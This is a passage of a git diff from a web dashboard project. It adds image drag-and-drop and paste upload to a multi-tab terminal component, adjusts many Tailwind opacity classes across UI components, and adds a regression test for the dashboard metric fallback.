+}
+
+// ─── Image upload helpers ─────────────────────────────────────────────────────
+
+const ALLOWED_IMAGE_TYPES = new Set([
+  "image/jpeg",
+  "image/png",
+  "image/gif",
+  "image/webp",
+])
+
+/**
+ * Upload an image file to the server's temp directory and inject the `@filepath`
+ * text into the PTY session's stdin.
+ *
+ * Observability:
+ * - console.warn on client-side validation failure
+ * - console.error on upload or inject failure
+ */
+async function uploadAndInjectImage(file: File, sessionId: string, projectCwd?: string): Promise<void> {
+  // Client-side validation
+  const validation = validateImageFile(file)
+  if (!validation.valid) {
+    console.warn("[terminal-upload] validation failed:", validation.error)
+    return
+  }
+
+  // Upload to temp dir
+  const formData = new FormData()
+  formData.append("file", file)
+
+  let uploadPath: string
+  try {
+    const res = await authFetch(buildProjectPath("/api/terminal/upload", projectCwd), {
+      method: "POST",
+      body: formData,
+    })
+    const data = await res.json() as { ok?: boolean; path?: string; error?: string }
+    if (!res.ok || !data.path) {
+      console.error("[terminal-upload] upload failed:", data.error ?? `HTTP ${res.status}`)
+      return
+    }
+    uploadPath = data.path
+  } catch (err) {
+    console.error("[terminal-upload] upload request failed:", err)
+    return
+  }
+
+  // Inject @filepath into PTY stdin
+  try {
+    const res = await authFetch(buildProjectPath("/api/terminal/input", projectCwd), {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({ id: sessionId, data: `@${uploadPath} ` }),
+    })
+    if (!res.ok) {
+      const data = await res.json().catch(() => ({})) as { error?: string }
+      console.error("[terminal-upload] inject failed:", data.error ?? `HTTP ${res.status}`)
+    }
+  } catch (err) {
+    console.error("[terminal-upload] inject request failed:", err)
+  }
+}
+
+// ─── Multi-instance terminal panel ────────────────────────────────────────────
+
+export function ShellTerminal({
+  className,
+  command,
+  commandArgs,
+  sessionPrefix,
+  hideSidebar = false,
+  fontSize,
+  hideInitialGsdHeader = false,
+  projectCwd,
+}: ShellTerminalProps) {
+  const { resolvedTheme } = useTheme()
+  const isDark = resolvedTheme !== "light"
+  const defaultId = sessionPrefix ?? (command ? "gsd-default" : "default")
+  const commandLabel = deriveCommandLabel(command)
+  const [tabs, setTabs] = useState<TerminalTab[]>([
+    { id: defaultId, label: commandLabel, connected: false },
+  ])
+  const [activeTabId, setActiveTabId] = useState(defaultId)
+  const [isDragOver, setIsDragOver] = useState(false)
+  const terminalAreaRef = useRef<HTMLDivElement>(null)
+
+  // ── Drag-and-drop handlers (native DOM, capture phase) ──────────────────
+  // React synthetic events don't reliably fire through xterm's internal DOM.
+  // Native capture-phase listeners intercept before xterm can swallow them —
+  // same pattern used for paste below.
+
+  useEffect(() => {
+    const el = terminalAreaRef.current
+    if (!el) return
+
+    let counter = 0
+
+    const onDragEnter = (e: DragEvent) => {
+      e.preventDefault()
+      e.stopPropagation()
+      counter += 1
+      if (counter === 1) setIsDragOver(true)
+    }
+
+    const onDragOver = (e: DragEvent) => {
+      e.preventDefault()
+      e.stopPropagation()
+    }
+
+    const onDragLeave = (e: DragEvent) => {
+      e.preventDefault()
+      e.stopPropagation()
+      counter -= 1
+      if (counter <= 0) {
+        counter = 0
+        setIsDragOver(false)
+      }
+    }
+
+    const onDrop = (e: DragEvent) => {
+      e.preventDefault()
+      e.stopPropagation()
+      counter = 0
+      setIsDragOver(false)
+
+      if (!activeTabId) return
+      const files = Array.from(e.dataTransfer?.files ?? [])
+      const imageFile = files.find((f) => ALLOWED_IMAGE_TYPES.has(f.type))
+      if (imageFile) {
+        void uploadAndInjectImage(imageFile, activeTabId, projectCwd)
+      }
+    }
+
+    el.addEventListener("dragenter", onDragEnter, true)
+    el.addEventListener("dragover", onDragOver, true)
+    el.addEventListener("dragleave", onDragLeave, true)
+    el.addEventListener("drop", onDrop, true)
+    return () => {
+      el.removeEventListener("dragenter", onDragEnter, true)
+      el.removeEventListener("dragover", onDragOver, true)
+      el.removeEventListener("dragleave", onDragLeave, true)
+      el.removeEventListener("drop", onDrop, true)
+    }
+  }, [activeTabId, projectCwd])
+
+  // ── Paste handler for images ──────────────────────────────────────────────
+
+  useEffect(() => {
+    const el = terminalAreaRef.current
+    if (!el) return
+
+    const handlePaste = (e: ClipboardEvent) => {
+      if (!e.clipboardData) return
+      const files = Array.from(e.clipboardData.files)
+      const imageFile = files.find((f) => ALLOWED_IMAGE_TYPES.has(f.type))
+      if (imageFile) {
+        e.preventDefault()
+        e.stopPropagation()
+        if (activeTabId) {
+          void uploadAndInjectImage(imageFile, activeTabId, projectCwd)
+        }
+      }
+      // If no image files, don't prevent default — let xterm.js handle text paste
+    }
+
+    el.addEventListener("paste", handlePaste, true) // capture phase to fire before xterm
+    return () => el.removeEventListener("paste", handlePaste, true)
+  }, [activeTabId, projectCwd])
+
+  const createTab = useCallback(async () => {
+    try {
+      const res = await authFetch(buildProjectPath("/api/terminal/sessions", projectCwd), {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify(command ? { command } : {}),
+      })
+      const data = (await res.json()) as { id: string }
+      const newTab: TerminalTab = {
+        id: data.id,
+        label: commandLabel,
+        connected: false,
+      }
+      setTabs((prev) => [...prev, newTab])
+      setActiveTabId(data.id)
+    } catch {
+      /* network error */
+    }
+  }, [command, commandLabel, projectCwd])
+
+  const closeTab = useCallback(
+    (id: string) => {
+      // Don't close the last tab
+      if (tabs.length <= 1) return
+      const deleteUrl = buildProjectAbsoluteUrl("/api/terminal/sessions", window.location.origin, projectCwd)
+      deleteUrl.searchParams.set("id", id)
+      void authFetch(deleteUrl.toString(), {
+        method: "DELETE",
+      })
+      const remaining = tabs.filter((t) => t.id !== id)
+      setTabs(remaining)
+      if (activeTabId === id) {
+        setActiveTabId(remaining[remaining.length - 1]?.id ?? defaultId)
+      }
+    },
+    [tabs, activeTabId, defaultId, projectCwd],
+  )
+
+  const updateConnection = useCallback(
+    (id: string, connected: boolean) => {
+      setTabs((prev) =>
+        prev.map((t) => (t.id === id ? { ...t, connected } : t)),
+      )
+    },
+    [],
+  )
+
+  return (
+    <div className={cn("flex bg-terminal", className)}>
+      {/* Terminal area — receives drag/drop and paste for images */}
+      <div
+        ref={terminalAreaRef}
+        className="relative flex-1 min-w-0"
+      >
+        {tabs.map((tab) => (
+          <TerminalInstance
+            key={tab.id}
+            sessionId={tab.id}
+            visible={tab.id === activeTabId}
+            command={command}
+            commandArgs={tab.id === defaultId ? commandArgs : undefined}
+            isDark={isDark}
+            fontSize={fontSize}
+            hideInitialGsdHeader={hideInitialGsdHeader}
+            projectCwd={projectCwd}
+            onConnectionChange={(c) => updateConnection(tab.id, c)}
+          />
+        ))}
+
+        {/* Drop overlay */}
+        {isDragOver && (
+          <div className="absolute inset-0 z-20 flex flex-col items-center justify-center gap-2 bg-background/80 backdrop-blur-sm border-2 border-dashed border-primary rounded-md pointer-events-none">
+            <ImagePlus className="h-8 w-8 text-primary" />
+            <span className="text-sm font-medium text-primary">Drop image here</span>
+          </div>
+        )}
+      </div>
+
+      {!hideSidebar && (
+        <div className="flex w-[34px] flex-shrink-0 flex-col border-l border-border/40 bg-terminal">
+          {/* New terminal button */}
+          <button
+            onClick={createTab}
+            className="flex h-[30px] w-full items-center justify-center text-muted-foreground transition-colors hover:bg-accent hover:text-accent-foreground"
+            title="New terminal"
+          >
+            <Plus className="h-3 w-3" />
+          </button>
+
+          <div className="h-px bg-border/40" />
+
+          {/* Tab list */}
+          <div className="flex-1 overflow-y-auto">
+            {tabs.map((tab, index) => (
+              <button
+                key={tab.id}
+                onClick={() => setActiveTabId(tab.id)}
+                className={cn(
+                  "group relative flex h-[30px] w-full items-center justify-center transition-colors",
+                  tab.id === activeTabId
+                    ? "bg-accent text-accent-foreground"
+                    : "text-muted-foreground hover:bg-accent/50 hover:text-accent-foreground",
+                )}
+                title={`${tab.label} ${index + 1}`}
+              >
+                {/* Active indicator bar */}
+                {tab.id === activeTabId && (
+                  <div className="absolute left-0 top-1.5 bottom-1.5 w-[2px] rounded-full bg-muted-foreground" />
+                )}
+
+                <div className="relative flex items-center">
+                  <TerminalSquare className="h-3 w-3" />
+                  {/* Connection dot */}
+                  <span
+                    className={cn(
+                      "absolute -bottom-0.5 -right-0.5 h-1.5 w-1.5 rounded-full border border-terminal",
+                      tab.connected ? "bg-success" : "bg-muted-foreground/40",
+                    )}
+                  />
+                </div>
+
+                {/* Close button — shows on hover as small badge in corner */}
+                {tabs.length > 1 && (
+                  <button
+                    onClick={(e) => {
+                      e.stopPropagation()
+                      closeTab(tab.id)
+                    }}
+                    className="absolute -right-0.5 -top-0.5 z-10 hidden h-3.5 w-3.5 items-center justify-center rounded-full bg-accent text-muted-foreground hover:bg-destructive/20 hover:text-destructive group-hover:flex"
+                    title="Kill terminal"
+                  >
+                    <X className="h-2 w-2" />
+                  </button>
+                )}
+              </button>
+            ))}
+          </div>
+        </div>
+      )}
+    </div>
+  )
+}
diff --git a/web/components/gsd/terminal.tsx b/web/components/gsd/terminal.tsx
index f2c0b06eb..b03af56eb 100644
--- a/web/components/gsd/terminal.tsx
+++ b/web/components/gsd/terminal.tsx
@@ -89,24 +89,24 @@ function TerminalWidgetBand({
 
   return (
     <div
-      className="border-t border-border/50 bg-card/20 px-4 py-2"
+      className="border-t border-border/50 bg-card/50 px-4 py-2"
       data-testid={placement === "aboveEditor" ? "terminal-widgets-above-editor" : "terminal-widgets-below-editor"}
     >
       <div className="space-y-2">
         {widgets.map((widget) => (
           <div
             key={`${widget.placement}:${widget.key}`}
-            className="rounded-md border border-border/60 bg-background/40 px-3 py-2"
+            className="rounded-md border border-border bg-background/50 px-3 py-2"
             data-testid="terminal-widget"
             data-widget-key={widget.key}
             data-widget-placement={widget.placement}
             title={widget.fullText}
           >
-            <div className="mb-1 flex items-center justify-between gap-2 text-[10px] uppercase tracking-[0.2em] text-muted-foreground/80">
+            <div className="mb-1 flex items-center justify-between gap-2 text-[10px] uppercase tracking-[0.2em] text-muted-foreground">
               <span className="truncate">{widget.key}</span>
               <span>{widget.placement === "aboveEditor" ? "Above editor" : "Below editor"}</span>
             </div>
-            <div className="space-y-1 text-xs text-foreground/90">
+            <div className="space-y-1 text-xs text-foreground">
               {widget.visibleLines.map((line, index) => (
                 <div key={`${widget.key}:${index}`} className="whitespace-pre-wrap break-words">
                   {line}
@@ -238,7 +238,7 @@ export function Terminal({ className }: TerminalProps) {
       <div className="flex-1 overflow-y-auto p-4">
         {workspace.terminalLines.map((line) => (
           <div key={line.id} className="flex" data-testid="terminal-line">
-            <span className="mr-2 select-none text-muted-foreground/50">{line.timestamp}</span>
+            <span className="mr-2 select-none text-muted-foreground">{line.timestamp}</span>
             <span
               className={cn(
                 "whitespace-pre-wrap",
@@ -260,7 +260,7 @@ export function Terminal({ className }: TerminalProps) {
             {workspace.liveTranscript.map((block, i) => (
               <div
                 key={`transcript-${i}`}
-                className="whitespace-pre-wrap rounded border border-border/30 bg-accent/20 px-3 py-2 text-foreground/90"
+                className="whitespace-pre-wrap rounded border border-border/50 bg-accent/20 px-3 py-2 text-foreground"
               >
                 {block}
               </div>
@@ -271,7 +271,7 @@ export function Terminal({ className }: TerminalProps) {
         {/* Live streaming assistant text */}
         {workspace.streamingAssistantText && (
           <div className="mt-2" data-testid="terminal-streaming-text">
-            <div className="whitespace-pre-wrap rounded border border-foreground/10 bg-foreground/[0.03] px-3 py-2 text-foreground/90">
+            <div className="whitespace-pre-wrap rounded border border-foreground/10 bg-foreground/[0.03] px-3 py-2 text-foreground">
               {workspace.streamingAssistantText}
               <span className="ml-0.5 inline-block h-4 w-1.5 animate-pulse bg-foreground/60" />
             </div>
@@ -328,7 +328,7 @@ export function Terminal({ className }: TerminalProps) {
           type="text"
           value={input}
           onChange={(event) => setInput(event.target.value)}
-          className="flex-1 bg-transparent text-foreground outline-none placeholder:text-muted-foreground/50 disabled:cursor-not-allowed disabled:text-muted-foreground"
+          className="flex-1 bg-transparent text-foreground outline-none placeholder:text-muted-foreground disabled:cursor-not-allowed disabled:text-muted-foreground"
           placeholder={inputModePlaceholder(inputMode, workspace)}
           disabled={isInputDisabled}
           data-testid="terminal-command-input"
diff --git a/web/components/gsd/visualizer-view.tsx b/web/components/gsd/visualizer-view.tsx
index c15b3a570..b769b3f11 100644
--- a/web/components/gsd/visualizer-view.tsx
+++ b/web/components/gsd/visualizer-view.tsx
@@ -62,7 +62,7 @@ function statusIcon(status: "complete" | "active" | "pending" | "done") {
     case "active":
       return <Play className="h-4 w-4 shrink-0 text-info" />
     case "pending":
-      return <Circle className="h-4 w-4 shrink-0 text-muted-foreground/30" />
+      return <Circle className="h-4 w-4 shrink-0 text-muted-foreground/50" />
   }
 }
 
@@ -121,9 +121,9 @@ function SectionLabel({ children }: { children: React.ReactNode }) {
 /** Large empty state with icon */
 function EmptyState({ message, icon: Icon = AlertCircle }: { message: string; icon?: React.ComponentType<{ className?: string }> }) {
   return (
-    <div className="flex flex-col items-center justify-center gap-4 rounded-xl border border-dashed border-border/60 py-16 text-center">
-      <div className="rounded-full border border-border/60 bg-muted/40 p-4">
-        <Icon className="h-6 w-6 text-muted-foreground/50" />
+    <div className="flex flex-col items-center justify-center gap-4 rounded-xl border border-dashed border-border py-16 text-center">
+      <div className="rounded-full border border-border bg-muted/50 p-4">
+        <Icon className="h-6 w-6 text-muted-foreground" />
       </div>
       <p className="text-sm font-medium text-muted-foreground">{message}</p>
     </div>
@@ -182,7 +182,7 @@ function ProgressBar({
   const pct = max > 0 ? Math.max(1, (value / max) * 100) : 0
   const barColor = { sky: "bg-info", emerald: "bg-success", amber: "bg-warning" }[color]
   return (
-    <div className="h-2 w-full overflow-hidden rounded-full bg-muted/60">
+    <div className="h-2 w-full overflow-hidden rounded-full bg-muted">
       <div
         className={cn("h-full rounded-full transition-all duration-700", barColor, animated && "animate-pulse")}
         style={{ width: `${pct}%` }}
@@ -261,7 +261,7 @@ function ProgressTab({ data }: { data: VisualizerData }) {
         {data.milestones.map((ms) => (
           <div key={ms.id} className="overflow-hidden rounded-xl border border-border bg-card">
             {/* Milestone header */}
-            <div className="flex items-center justify-between border-b border-border bg-muted/20 px-5 py-4">
+            <div className="flex items-center justify-between border-b border-border bg-muted/50 px-5 py-4">
               <div className="flex items-center gap-3">
                 {statusIcon(ms.status)}
                 <span className="font-mono text-xs font-semibold text-muted-foreground">{ms.id}</span>
@@ -324,7 +324,7 @@ function ProgressTab({ data }: { data: VisualizerData }) {
                                 "flex items-center gap-2.5 rounded-lg px-3 py-2 transition-colors",
                                 task.active
                                   ? "bg-info/8 border border-info/20"
-                                  : "hover:bg-muted/40",
+                                  : "hover:bg-muted/50",
                               )}
                             >
                               {taskStatusIcon(task)}
@@ -332,7 +332,7 @@ function ProgressTab({ data }: { data: VisualizerData }) {
                               <span
                                 className={cn(
                                   "text-sm",
-                                  task.done && "text-muted-foreground/50 line-through",
+                                  task.done && "text-muted-foreground line-through",
                                   task.active && "font-semibold text-info",
                                   !task.done && !task.active && "text-muted-foreground",
                                 )}
@@ -383,8 +383,8 @@ function DepsTab({ data }: { data: VisualizerData }) {
                     <span className="rounded-lg border border-info/25 bg-info/10 px-3 py-1.5 font-mono text-sm font-semibold text-info">
                       {dep}
                     </span>
-                    <ArrowRight className="h-4 w-4 text-muted-foreground/50" />
-                    <span className="rounded-lg border border-border bg-muted/40 px-3 py-1.5 font-mono text-sm font-medium">
+                    <ArrowRight className="h-4 w-4 text-muted-foreground" />
+                    <span className="rounded-lg border border-border bg-muted/50 px-3 py-1.5 font-mono text-sm font-medium">
                       {ms.id}
                     </span>
                     <span className="text-sm text-muted-foreground">{ms.title}</span>
@@ -415,8 +415,8 @@ function DepsTab({ data }: { data: VisualizerData }) {
                         <span className="rounded-lg border border-info/25 bg-info/10 px-3 py-1.5 font-mono text-sm font-semibold text-info">
                           {dep}
                         </span>
-                        <ArrowRight className="h-4 w-4 text-muted-foreground/50" />
-                        <span className="rounded-lg border border-border bg-muted/40 px-3 py-1.5 font-mono text-sm font-medium">
+                        <ArrowRight className="h-4 w-4 text-muted-foreground" />
+                        <span className="rounded-lg border border-border bg-muted/50 px-3 py-1.5 font-mono text-sm font-medium">
                           {sl.id}
                         </span>
                         <span className="text-sm text-muted-foreground">{sl.title}</span>
@@ -450,7 +450,7 @@ function DepsTab({ data }: { data: VisualizerData }) {
                         {id}
                       </span>
                       {i < cp.milestonePath.length - 1 && (
-                        <ChevronRight className="h-4 w-4 text-muted-foreground/50" />
+                        <ChevronRight className="h-4 w-4 text-muted-foreground" />
                       )}
                     </span>
                   ))}
@@ -467,7 +467,7 @@ function DepsTab({ data }: { data: VisualizerData }) {
                     {data.milestones
                       .filter((m) => !cp.milestonePath.includes(m.id))
                       .map((m) => (
-                        <div key={m.id} className="flex items-center gap-4 rounded-lg bg-muted/30 px-4 py-2.5">
+                        <div key={m.id} className="flex items-center gap-4 rounded-lg bg-muted/50 px-4 py-2.5">
                           <span className="w-16 font-mono text-sm font-semibold">{m.id}</span>
                           <span className="text-sm text-muted-foreground">{m.title}</span>
                           <span className="ml-auto font-mono text-xs text-muted-foreground">
@@ -492,7 +492,7 @@ function DepsTab({ data }: { data: VisualizerData }) {
                           {id}
                         </span>
                         {i < cp.slicePath.length - 1 && (
-                          <ChevronRight className="h-4 w-4 text-muted-foreground/50" />
+                          <ChevronRight className="h-4 w-4 text-muted-foreground" />
                         )}
                       </span>
                     ))}
@@ -530,7 +530,7 @@ function DepsTab({ data }: { data: VisualizerData }) {
                     {Object.entries(cp.sliceSlack).map(([id, slack]) => (
                       <span
                         key={id}
-                        className="rounded-lg border border-border bg-muted/40 px-3 py-1.5 font-mono text-xs text-muted-foreground"
+                        className="rounded-lg border border-border bg-muted/50 px-3 py-1.5 font-mono text-xs text-muted-foreground"
                       >
                         {id}: {slack}
                       </span>
@@ -639,7 +639,7 @@ function MetricsTab({ data }: { data: VisualizerData }) {
               </thead>
               <tbody className="divide-y divide-border/50">
                 {data.bySlice.map((sl) => (
-                  <tr key={sl.sliceId} className="transition-colors hover:bg-muted/30">
+                  <tr key={sl.sliceId} className="transition-colors hover:bg-muted/50">
                     <td className="py-3 pr-5 font-mono text-xs font-semibold">{sl.sliceId}</td>
                     <td className="py-3 pr-5 text-right tabular-nums text-muted-foreground">{sl.units}</td>
                     <td className="py-3 pr-5 text-right tabular-nums font-medium">{formatCost(sl.cost)}</td>
@@ -732,7 +732,7 @@ function TimelineTab({ data }: { data: VisualizerData }) {
     <div className="space-y-4">
       <div className="overflow-hidden rounded-xl border border-border bg-card">
         {/* Header */}
-        <div className="border-b border-border bg-muted/20 px-6 py-4">
+        <div className="border-b border-border bg-muted/50 px-6 py-4">
           <SectionLabel>Execution Timeline</SectionLabel>
           <p className="mt-1.5 text-xs text-muted-foreground">
             Showing {recent.length} of {data.units.length} units — most recent first
@@ -758,7 +758,7 @@ function TimelineTab({ data }: { data: VisualizerData }) {
             return (
               <div
                 key={`${unit.id}-${unit.startedAt}-${i}`}
-                className="grid grid-cols-[3.5rem_1.5rem_5rem_8rem_1fr_4.5rem_5rem] items-center gap-3 px-6 py-3.5 transition-colors hover:bg-muted/30"
+                className="grid grid-cols-[3.5rem_1.5rem_5rem_8rem_1fr_4.5rem_5rem] items-center gap-3 px-6 py-3.5 transition-colors hover:bg-muted/50"
               >
                 <span className="font-mono text-xs text-muted-foreground">
                   {formatTime(unit.startedAt)}
@@ -816,7 +816,7 @@ function AgentTab({ data }: { data: VisualizerData }) {
               "relative flex h-10 w-10 items-center justify-center rounded-full",
               activity.active
                 ? "bg-success/15"
-                : "bg-muted/60",
+                : "bg-muted",
             )}>
               {activity.active && (
                 <div className="absolute inset-0 animate-ping rounded-full bg-success/20" />
@@ -886,7 +886,7 @@ function AgentTab({ data }: { data: VisualizerData }) {
       {/* Recent units */}
       {data.units.filter((u) => u.finishedAt > 0).length > 0 && (
         <div className="overflow-hidden rounded-xl border border-border bg-card">
-          <div className="border-b border-border bg-muted/20 px-6 py-4">
+          <div className="border-b border-border bg-muted/50 px-6 py-4">
             <SectionLabel>Recent Completed Units</SectionLabel>
           </div>
           <div className="divide-y divide-border/40">
@@ -895,7 +895,7 @@ function AgentTab({ data }: { data: VisualizerData }) {
               .slice(-5)
               .reverse()
               .map((u, i) => (
-                <div key={`${u.id}-${i}`} className="flex items-center gap-4 px-6 py-4 transition-colors hover:bg-muted/30">
+                <div key={`${u.id}-${i}`} className="flex items-center gap-4 px-6 py-4 transition-colors hover:bg-muted/50">
                   <span className="w-12 font-mono text-xs text-muted-foreground">{formatTime(u.startedAt)}</span>
                   <CheckCircle2 className="h-4 w-4 shrink-0 text-success" />
                   <span className="flex-1 truncate text-sm font-medium">{u.type}</span>
@@ -927,7 +927,7 @@ function ChangesTab({ data }: { data: VisualizerData }) {
       {sorted.map((entry, i) => (
         <div key={`${entry.milestoneId}-${entry.sliceId}-${i}`} className="overflow-hidden rounded-xl border border-border bg-card">
           {/* Header */}
-          <div className="flex items-center justify-between border-b border-border bg-muted/20 px-6 py-4">
+          <div className="flex items-center justify-between border-b border-border bg-muted/50 px-6 py-4">
             <div className="flex items-center gap-3">
               <CheckCircle2 className="h-4 w-4 shrink-0 text-success" />
               <span className="font-mono text-xs font-bold text-success">
@@ -956,11 +956,11 @@ function ChangesTab({ data }: { data: VisualizerData }) {
                 </p>
                 <div className="space-y-2">
                   {entry.filesModified.map((f, fi) => (
-                    <div key={fi} className="flex items-start gap-3 rounded-lg bg-muted/30 px-4 py-2.5">
+                    <div key={fi} className="flex items-start gap-3 rounded-lg bg-muted/50 px-4 py-2.5">
                       <CheckCircle2 className="mt-0.5 h-3.5 w-3.5 shrink-0 text-success/70" />
                       <span className="font-mono text-xs font-medium text-muted-foreground">{f.path}</span>
                       {f.description && (
-                        <span className="ml-1 text-xs text-muted-foreground/60">— {f.description}</span>
+                        <span className="ml-1 text-xs text-muted-foreground">— {f.description}</span>
                       )}
                     </div>
                   ))}
@@ -1069,7 +1069,7 @@ function ExportTab({ data }: { data: VisualizerData }) {
         <div className="mt-7 grid gap-4 sm:grid-cols-2">
           <button
             onClick={handleMarkdown}
-            className="group flex items-center gap-5 rounded-xl border border-border bg-muted/20 p-5 text-left transition-all hover:border-info/40 hover:bg-info/5"
+            className="group flex items-center gap-5 rounded-xl border border-border bg-muted/50 p-5 text-left transition-all hover:border-info/40 hover:bg-info/5"
           >
             <div className="rounded-xl border border-info/20 bg-info/10 p-4 transition-colors group-hover:bg-info/15">
               <FileText className="h-6 w-6 text-info" />
@@ -1083,7 +1083,7 @@ function ExportTab({ data }: { data: VisualizerData }) {
 
           <button
             onClick={handleJSON}
-            className="group flex items-center gap-5 rounded-xl border border-border bg-muted/20 p-5 text-left transition-all hover:border-success/40 hover:bg-success/5"
+            className="group flex items-center gap-5 rounded-xl border border-border bg-muted/50 p-5 text-left transition-all hover:border-success/40 hover:bg-success/5"
           >
             <div className="rounded-xl border border-success/20 bg-success/10 p-4 transition-colors group-hover:bg-success/15">
               <FileJson className="h-6 w-6 text-success" />
@@ -1147,10 +1147,10 @@ function VisualizerTabList() {
           />
 
           {/* Hover background */}
-          <span className="absolute inset-x-0 inset-y-1.5 rounded-lg bg-muted/0 transition-colors duration-150 group-hover:bg-muted/60 group-data-[state=active]:bg-transparent" />
+          <span className="absolute inset-x-0 inset-y-1.5 rounded-lg bg-muted/0 transition-colors duration-150 group-hover:bg-muted group-data-[state=active]:bg-transparent" />
 
           {/* Icon */}
-          <Icon className="relative h-4 w-4 shrink-0 transition-colors duration-150 text-muted-foreground/70 group-hover:text-foreground/70 group-data-[state=active]:text-foreground" />
+          <Icon className="relative h-4 w-4 shrink-0 transition-colors duration-150 text-muted-foreground group-hover:text-muted-foreground group-data-[state=active]:text-foreground" />
 
           {/* Label */}
           <span className="relative">{label}</span>
diff --git a/web/components/ui/kbd.tsx b/web/components/ui/kbd.tsx
index 9897f35ef..69298d9b3 100644
--- a/web/components/ui/kbd.tsx
+++ b/web/components/ui/kbd.tsx
@@ -7,7 +7,7 @@ function Kbd({ className, ...props }: React.ComponentProps<'kbd'>) {
       className={cn(
         'bg-muted w-fit text-muted-foreground pointer-events-none inline-flex h-5 min-w-5 items-center justify-center gap-1 rounded-sm px-1 font-sans text-xs font-medium select-none',
         "[&_svg:not([class*='size-'])]:size-3",
-        '[[data-slot=tooltip-content]_&]:bg-background/20 [[data-slot=tooltip-content]_&]:text-background dark:[[data-slot=tooltip-content]_&]:bg-background/10',
+        '[[data-slot=tooltip-content]_&]:bg-background/50 [[data-slot=tooltip-content]_&]:text-background dark:[[data-slot=tooltip-content]_&]:bg-background/10',
         className,
       )}
       {...props}
diff --git a/web/components/ui/sidebar.tsx b/web/components/ui/sidebar.tsx
index c79c8a124..21549f838 100644
--- a/web/components/ui/sidebar.tsx
+++ b/web/components/ui/sidebar.tsx
@@ -405,7 +405,7 @@ function SidebarGroupLabel({
       data-slot="sidebar-group-label"
       data-sidebar="group-label"
       className={cn(
-        'text-sidebar-foreground/70 ring-sidebar-ring flex h-8 shrink-0 items-center rounded-md px-2 text-xs font-medium outline-hidden transition-[margin,opacity] duration-200 ease-linear focus-visible:ring-2 [&>svg]:size-4 [&>svg]:shrink-0',
+        'text-sidebar-foreground ring-sidebar-ring flex h-8 shrink-0 items-center rounded-md px-2 text-xs font-medium outline-hidden transition-[margin,opacity] duration-200 ease-linear focus-visible:ring-2 [&>svg]:size-4 [&>svg]:shrink-0',
         'group-data-[collapsible=icon]:-mt-8 group-data-[collapsible=icon]:opacity-0',
         className,
       )}
diff --git a/web/components/ui/toast.tsx b/web/components/ui/toast.tsx
index 3a8c4f094..a2e43e1dd 100644
--- a/web/components/ui/toast.tsx
+++ b/web/components/ui/toast.tsx
@@ -77,7 +77,7 @@ const ToastClose = React.forwardRef<
   <ToastPrimitives.Close
     ref={ref}
     className={cn(
-      'absolute right-2 top-2 rounded-md p-1 text-foreground/50 opacity-0 transition-opacity hover:text-foreground focus:opacity-100 focus:outline-none focus:ring-2 group-hover:opacity-100 group-[.destructive]:text-destructive group-[.destructive]:hover:text-destructive group-[.destructive]:focus:ring-destructive group-[.destructive]:focus:ring-offset-destructive',
+      'absolute right-2 top-2 rounded-md p-1 text-muted-foreground opacity-0 transition-opacity hover:text-foreground focus:opacity-100 focus:outline-none focus:ring-2 group-hover:opacity-100 group-[.destructive]:text-destructive group-[.destructive]:hover:text-destructive group-[.destructive]:focus:ring-destructive group-[.destructive]:focus:ring-offset-destructive',
       className,
     )}
     toast-close=""
diff --git a/web/lib/__tests__/dashboard-metrics-fallback.test.ts b/web/lib/__tests__/dashboard-metrics-fallback.test.ts
new file mode 100644
index 000000000..626e68a36
--- /dev/null
+++ b/web/lib/__tests__/dashboard-metrics-fallback.test.ts
@@ -0,0 +1,72 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+/**
+ * Regression tests for dashboard metric fallback chain.
+ *
+ * The dashboard reads metrics from two sources:
+ *   1. projectTotals (polled from /api/visualizer — always available)
+ *   2. auto (live auto-mode data — null when auto is not active)
+ *
+ * Fallback chain: projectTotals?.X ?? auto?.X ?? 0
+ *
+ * See: https://github.com/gsd-build/gsd-2/issues/2709
+ */
+
+interface ProjectTotals {
+  duration: number;
+  cost: number;
+  tokens: { total: number };
+}
+
+interface AutoDashboard {
+  elapsed: number;
+  totalCost: number;
+  totalTokens: number;
+}
+
+/** Mirrors the fallback logic in dashboard.tsx */
+function deriveMetrics(
+  projectTotals: ProjectTotals | null,
+  auto: AutoDashboard | null,
+) {
+  return {
+    elapsed: projectTotals?.duration ?? auto?.elapsed ?? 0,
+    totalCost: projectTotals?.cost ?? auto?.totalCost ?? 0,
+    totalTokens: projectTotals?.tokens.total ?? auto?.totalTokens ?? 0,
+  };
+}
+
+describe("dashboard metric fallback (#2709 regression)", () => {
+  test("returns zero when both sources are null", () => {
+    const result = deriveMetrics(null, null);
+    assert.equal(result.elapsed, 0);
+    assert.equal(result.totalCost, 0);
+    assert.equal(result.totalTokens, 0);
+  });
+
+  test("uses auto data when projectTotals is null", () => {
+    const auto: AutoDashboard = { elapsed: 5000, totalCost: 1.5, totalTokens: 10000 };
+    const result = deriveMetrics(null, auto);
+    assert.equal(result.elapsed, 5000);
+    assert.equal(result.totalCost, 1.5);
+    assert.equal(result.totalTokens, 10000);
+  });
+
+  test("uses projectTotals when auto is null (manual mode)", () => {
+    const totals: ProjectTotals = { duration: 60000, cost: 3.2, tokens: { total: 50000 } };
+    const result = deriveMetrics(totals, null);
+    assert.equal(result.elapsed, 60000);
+    assert.equal(result.totalCost, 3.2);
+    assert.equal(result.totalTokens, 50000);
+  });
+
+  test("projectTotals takes precedence over auto when both present", () => {
+    const totals: ProjectTotals = { duration: 120000, cost: 5.0, tokens: { total: 80000 } };
+    const auto: AutoDashboard = { elapsed: 10000, totalCost: 0.5, totalTokens: 5000 };
+    const result = deriveMetrics(totals, auto);
+    assert.equal(result.elapsed, 120000, "projectTotals duration should take precedence");
+    assert.equal(result.totalCost, 5.0, "projectTotals cost should take precedence");
+    assert.equal(result.totalTokens, 80000, "projectTotals tokens should take precedence");
+  });
+});
diff --git a/web/lib/__tests__/shutdown-gate.test.ts b/web/lib/__tests__/shutdown-gate.test.ts
new file mode 100644
index 000000000..6986ddec7
--- /dev/null
+++ b/web/lib/__tests__/shutdown-gate.test.ts
@@ -0,0 +1,83 @@
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  scheduleShutdown,
+  cancelShutdown,
+  isShutdownPending,
+  isDaemonMode,
+} from "../shutdown-gate.ts";
+
+describe("shutdown-gate", () => {
+  afterEach(() => {
+    // Always clean up any pending timers between tests
+    cancelShutdown();
+    delete process.env.GSD_WEB_DAEMON_MODE;
+  });
+
+  describe("default mode (no daemon)", () => {
